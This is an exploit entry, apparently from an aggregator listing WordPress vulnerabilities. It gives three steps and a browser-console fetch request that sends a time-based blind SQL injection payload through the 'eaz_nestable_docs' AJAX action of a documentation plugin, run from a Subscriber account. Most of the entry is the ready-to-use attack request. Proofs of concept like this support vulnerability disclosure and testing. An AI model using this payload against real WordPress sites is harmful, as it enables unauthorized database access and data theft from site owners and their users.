## https://sploitus.com/exploit?id=WPEX-ID:44F5A29A-05F9-40D2-80F2-6FB2BDA60D79
1. Create a document then create some sections in the document
2. Log in as Subscriber
3. Paste the following script in the browser's console, and notice it hangs for 5 seconds, indicating the injection succeeded:
```
await fetch("/wp-admin/admin-ajax.php", {
"credentials": "include",
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "action=eaz_nestable_docs&data=%5b%7b%22id%22%3a%2286'and(select*from(select(sleep(5)))a)%23%22%7d%5d",
"method": "POST",
"mode": "cors"
});
```